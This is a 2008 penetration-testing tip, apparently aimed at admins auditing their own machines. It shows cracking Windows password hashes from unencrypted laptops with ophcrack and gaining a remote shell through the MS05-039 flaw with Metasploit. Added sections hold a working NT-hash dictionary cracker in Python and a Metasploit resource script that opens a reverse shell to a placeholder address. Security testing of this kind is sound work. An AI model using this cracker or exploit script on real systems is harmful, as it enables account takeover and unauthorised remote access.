How to exploit two common Windows vulnerabilities


Kevin Beaver, CISSP
10.08.2008


In a previous tip about the 10 most common Windows vulnerabilities, I outlined the Windows flaws I see the most in my security assessment work. Now I want to take the two particular vulnerabilities I see more than any others and show you how they're exploited. You can then use these techniques on your Windows systems to find the holes before a malicious user does. One exploit is relatively non-technical and the other goes a little more in-depth but certainly doesn't require "elite" hacker skills. Either way, you can execute each of them using free tools in a matter of minutes. Let's jump right in.

Unencrypted laptops

First, let's look at the problem with unencrypted laptop drives. Given all the data breaches related to mobile systems, this is arguably one of the greatest business risks security administrators face today. Here's how a laptop running any version of Windows, with no drive encryption, can be owned in, say, 30 minutes or less.

Step 1: Download/install the current version of the ophcrack LiveCD and burn the ISO image onto CD. You can also carry out this exploit with the commercial Elcomsoft System Recovery program and similar tools, but I'll stick with the freebie for this exercise.

Step 2: Boot your test system from the ophcrack LiveCD. After it loads the operating system, the application and the default rainbow tables (which can take a few minutes), the program automatically goes to work on the local Windows password hashes, which it reads straight from the SAM on the unencrypted drive. It cracks LAN Manager (LM) hashes with ease: an LM hash is unsalted, case-insensitive and built from two independent 7-character halves, so the default tables cover it almost completely. A couple of sample passwords (a blank one and a very basic one) discovered are shown in Figure 1.

Figure 1:
[IMAGE]
Use the Ophcrack LiveCD to crack Windows passwords.

It only took a few minutes to crack these. More complex ones can be uncovered in short order too.

Step 3: If the initial run finishes without recovering every password, click "Load" to load previously downloaded or purchased rainbow tables that cover more complex hashes, such as the NT (NTLM) hashes that Vista stores by default instead of LM hashes. NT hashes are case-sensitive and not split into halves, so the tables are much larger, but they are still unsalted, which is why precomputed tables work against them at all.

Step 4: Now that one -- and likely all -- password hashes have been cracked, you simply shut down the ophcrack LiveCD, reboot the system into Windows and log in using your recovered password(s). An administrator-level login will buy you more, but you can almost always find sensitive information and stored passwords and even gain access to Windows domains and VPNs as a standard Windows user. The system is yours.

I can't think of a better way to demonstrate the need for laptop drive encryption. Cracking is not even a prerequisite: anyone who can boot the machine from removable media can read the files on an unencrypted drive directly. The fix is full-disk encryption, not a stricter password policy.
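Why a LiveCD full of precomputed tables works at all, as an added example that is not part of the original tip: Windows stores its password hashes without a salt, so one table (or one dictionary) cracks every machine. The script below implements MD4 inline (RFC 1320, so it runs without OpenSSL's legacy provider), computes NT hashes exactly as the SAM stores them (MD4 over the UTF-16LE password), and runs a dictionary attack over a few constructed pwdump-style lines. The account names, the wordlist and the "Winter2008!" password are made up for the demonstration; the literal hashes for "password" and for the empty password are the well-known values, and the LM field is the well-known "LM disabled/empty" marker, which is what Vista writes by default and why Step 2's LM tables find nothing there.

```python
"""Unsalted Windows hashes: one table cracks every SAM.

Added example, not code from the original tip.  MD4 is implemented
inline per RFC 1320; the pwdump-style lines below are constructed.
"""
import struct

MASK32 = 0xFFFFFFFF


def _rotl(x, n):
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (three rounds of 16 operations per 64-byte block)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)

    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z

    round3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):                                   # round 1
            a = _rotl(a + f(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a = _rotl(a + g(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate(round3_order):                  # round 3
            a = _rotl(a + h(b, c, d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a0, b0 = (a0 + a) & MASK32, (b0 + b) & MASK32
        c0, d0 = (c0 + c) & MASK32, (d0 + d) & MASK32
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4(UTF-16LE(password)); no salt,
    so the same password yields the same hash on every machine."""
    return md4(password.encode("utf-16-le")).hex()


# LM hash of the empty password; also what Windows stores when LM
# hashing is disabled (the Vista default).  Ophcrack's LM tables are
# useless against such an account; only the NT hash can be cracked.
LM_EMPTY = "aad3b435b51404eeaad3b435b51404ee"


def lm_disabled(pwdump_line: str) -> bool:
    """True when the LM field carries no usable LM hash."""
    return pwdump_line.split(":")[2].lower() == LM_EMPTY


def crack_pwdump(lines, wordlist):
    """Dictionary attack over pwdump-style lines (user:rid:lm:nt:::).
    The hash table is built once and reused for every account, which is
    exactly the property a rainbow table exploits.  Returns
    {user: recovered password or None}."""
    table = {nt_hash(word): word for word in wordlist}
    results = {}
    for line in lines:
        user, _rid, _lm, nt = line.split(":")[:4]
        results[user] = table.get(nt.lower())
    return results


# Constructed sample data, not a real dump.  "password" and "" hashes are
# the well-known literal values; jdoe's hash is computed from a made-up
# password that is deliberately absent from the wordlist.
SAMPLE_DUMP = [
    "Administrator:500:" + LM_EMPTY + ":8846f7eaee8fb117ad06bdd830b7586c:::",
    "Guest:501:" + LM_EMPTY + ":31d6cfe0d16ae931b73c59d7e0c089c0:::",
    "jdoe:1001:" + LM_EMPTY + ":" + nt_hash("Winter2008!") + ":::",
]
WORDLIST = ["password", "", "letmein", "Password1"]

if __name__ == "__main__":
    for user, pw in crack_pwdump(SAMPLE_DUMP, WORDLIST).items():
        print(f"{user:15} {pw!r}")
```

The Administrator and Guest entries fall immediately, jdoe does not; swapping in a bigger wordlist or a rainbow table changes only the size of `table`, never the cost per account, which is the whole reason the LiveCD finishes in minutes.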

For the second example, let's look at how easy it is to gain full remote access to a Windows system by exploiting a missing patch vulnerability.

Step 1: Run your favorite vulnerability scanner against your network and look for Windows systems that have vulnerabilities related to missing patches. These findings typically reference Microsoft remote code execution bulletins such as MS05-039 (Plug and Play service) and MS06-040 (Server service) -- yes, oldies but goodies I often come across. Figure 2 shows a QualysGuard finding that indicates a missing MS05-039 patch.

Figure 2:
[IMAGE]
QualysGuard report highlights an exploitable Windows vulnerability.

Step 2: Download/install the current version of Metasploit -- a free exploitation tool that can be used to demonstrate what happens when Windows systems aren't properly patched.

Step 3: Search the Metasploit exploit interface for a matching exploit. In Figure 3, using the MS05-039 example, you can see that Metasploit does indeed have an exploit that can be carried out on the target system.

Figure 3:
[IMAGE]
Search the Metasploit database to confirm an exploit is available.

This is a rudimentary -- and often frustrating -- way of connecting the dots between a scanner finding and a working exploit, but it's the only reasonable way to go about it.

Step 4: Use the MSF Assistant GUI to plug in some basic variables for running your exploit. I typically use a reverse command shell (generic/shell_reverse_tcp) for the payload so I can demonstrate remote command prompt access, but there are many others you can select from such as add user and dllinject. Specific steps for carrying out the MS05-039 exploit are shown in Figures 4 through 8.

Figure 4:
[IMAGE]
Select the MS05_039_pnp exploit under Windows/SMB.

Figure 5:
[IMAGE]
Select your target version of Windows (if you don't know it, try them all).

Figure 6:
[IMAGE]
Select the payload (what you want it to do upon exploitation).

Figure 7:
[IMAGE]
Enter the IP address of the target system (RHOST) and of your local system (LHOST). With a reverse shell payload the target connects back to LHOST, so make sure nothing between the two hosts blocks that connection.

Figure 8:
[IMAGE]
Click Apply and voilà! You're done.

Step 5: You'll now be presented with a command prompt on the remote system. The system is yours.
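The same Steps 4 and 5 driven from msfconsole instead of the Assistant GUI, as an added example that is not part of the original tip. It is a Metasploit resource script; the two IP addresses are placeholders for your lab, and the target index must be chosen from the `show targets` list (Figure 5).

```text
# ms05_039.rc : resource script equivalent to the clicks in Figures 4-8.
# Run it with:  msfconsole -r ms05_039.rc
# Placeholder addresses below; replace with your target and your own box.
use exploit/windows/smb/ms05_039_pnp
show targets
# set TARGET <index from the list above> if the default does not match
set RHOST 192.0.2.10
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.0.2.5
set LPORT 4444
exploit
```

If the exploit reports success but no shell arrives, the usual cause is that the target cannot reach LHOST:LPORT (host firewall or intervening filtering); a bind payload or a different LPORT is the first thing to try.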

Take these techniques and tools for a spin and see what holes you can find -- and plug in a hurry -- while you can. There are plenty of other exploits you can carry out against your systems -- enough to fill an entire book. In fact, I (and many others) have done just that, so know this is just the beginning of your Windows security testing endeavors. Once you get these common Windows issues out of the way, you can tackle websites/apps, databases, wireless networks and so on -- the fun's never ending!

About the author: Kevin Beaver is an information security consultant, keynote speaker and expert witness with Atlanta-based Principle Logic LLC where he specializes in performing independent security assessments. Kevin has authored/co-authored seven books on information security including Hacking For Dummies and Hacking Wireless Networks For Dummies (Wiley). He's also the creator of the Security On Wheels information security audio books and blog providing security learning for IT professionals on the go. Kevin can be reached at kbeaver@principlelogic.com.


Published on SearchEnterpriseDesktop.com (TechTarget). Copyright 2008 - 2009, TechTarget. All Rights Reserved.